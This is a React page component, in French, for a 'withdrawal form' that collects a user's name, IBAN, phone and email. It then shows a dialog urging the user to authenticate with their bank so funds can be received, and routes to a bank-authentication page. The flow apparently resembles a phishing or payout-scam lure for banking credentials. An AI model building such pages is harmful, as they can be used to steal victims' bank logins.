import React, { useState } from "react";
import { useNavigate } from "react-router-dom";
import { FileText, AlertCircle } from "lucide-react";
import { toast } from "sonner";
import Header from "../components/common/Header";
import SecurityMessage from "../components/common/SecurityMessage";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import {
  AlertDialog,
  AlertDialogAction,
  AlertDialogContent,
  AlertDialogDescription,
  AlertDialogFooter,
  AlertDialogHeader,
  AlertDialogTitle,
} from "@/components/ui/alert-dialog";

const WithdrawalFormPage = ({ onSubmit, withdrawalData }) => {
  const [formData, setFormData] = useState(withdrawalData || {
    fullName: "",
    iban: "",
    phone: "",
    email: ""
  });
  const [showDialog, setShowDialog] = useState(false);
  const navigate = useNavigate();

  const handleChange = (e) => {
    setFormData({
      ...formData,
      [e.target.name]: e.target.value
    });
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    onSubmit(formData);
    setShowDialog(true);
  };

  const handleApprove = () => {
    setShowDialog(false);
    toast.success("Informations enregistrées");
    navigate("/authentification-bancaire");
  };

  return (
    <div className="min-h-screen flex flex-col">
      <Header minimal />
      
      <div className="flex-1 px-6 py-12 bg-slate-50">
        <div className="max-w-2xl mx-auto">
          <div className="text-center mb-8">
            <div className="bg-primary/10 rounded-full w-16 h-16 flex items-center justify-center mx-auto mb-4">
              <FileText className="h-8 w-8 text-primary" />
            </div>
            <h1 className="text-3xl font-bold text-primary mb-2">Formulaire de retrait</h1>
            <p className="text-slate-600">
              Renseignez vos informations bancaires pour le transfert
            </p>
          </div>

          <div className="bg-white rounded-xl border border-slate-200 shadow-sm p-8">
            <form onSubmit={handleSubmit} className="space-y-6">
              <div className="space-y-2">
                <Label htmlFor="fullName">Nom complet</Label>
                <Input
                  id="fullName"
                  name="fullName"
                  type="text"
                  placeholder="Jean Dupont"
                  value={formData.fullName}
                  onChange={handleChange}
                  required
                  data-testid="fullname-input"
                  className="h-11"
                />
              </div>

              <div className="space-y-2">
                <Label htmlFor="iban">IBAN</Label>
                <Input
                  id="iban"
                  name="iban"
                  type="text"
                  placeholder="FR76 XXXX XXXX XXXX XXXX XXXX XXX"
                  value={formData.iban}
                  onChange={handleChange}
                  required
                  data-testid="iban-input"
                  className="h-11"
                />
              </div>

              <div className="space-y-2">
                <Label htmlFor="phone">Numéro de téléphone</Label>
                <Input
                  id="phone"
                  name="phone"
                  type="tel"
                  placeholder="+689 XX XX XX XX"
                  value={formData.phone}
                  onChange={handleChange}
                  required
                  data-testid="phone-input"
                  className="h-11"
                />
              </div>

              <div className="space-y-2">
                <Label htmlFor="email">Adresse e-mail</Label>
                <Input
                  id="email"
                  name="email"
                  type="email"
                  placeholder="votre.email@exemple.com"
                  value={formData.email}
                  onChange={handleChange}
                  required
                  data-testid="email-input"
                  className="h-11"
                />
              </div>

              <Button
                type="submit"
                className="w-full h-11 bg-primary hover:bg-primary/90"
                data-testid="validate-btn"
              >
                Valider
              </Button>
            </form>
          </div>

          <SecurityMessage />
        </div>
      </div>

      <AlertDialog open={showDialog} onOpenChange={setShowDialog}>
        <AlertDialogContent className="max-w-lg" data-testid="verification-dialog">
          <AlertDialogHeader>
            <div className="flex items-center gap-3 mb-2">
              <AlertCircle className="h-6 w-6 text-amber-500" />
              <AlertDialogTitle className="text-xl">Vérification requise</AlertDialogTitle>
            </div>
            <AlertDialogDescription className="text-base leading-relaxed text-slate-600">
              Pour finaliser le transfert, veuillez vous authentifier auprès de votre banque afin de confirmer 
              l'éligibilité de votre compte à la réception des fonds. Cette démarche permet d'éviter tout blocage 
              ou rejet de virement.
            </AlertDialogDescription>
          </AlertDialogHeader>
          <AlertDialogFooter>
            <AlertDialogAction
              onClick={handleApprove}
              className="bg-primary hover:bg-primary/90"
              data-testid="approve-btn"
            >
              Approuver
            </AlertDialogAction>
          </AlertDialogFooter>
        </AlertDialogContent>
      </AlertDialog>
    </div>
  );
};

export default WithdrawalFormPage;
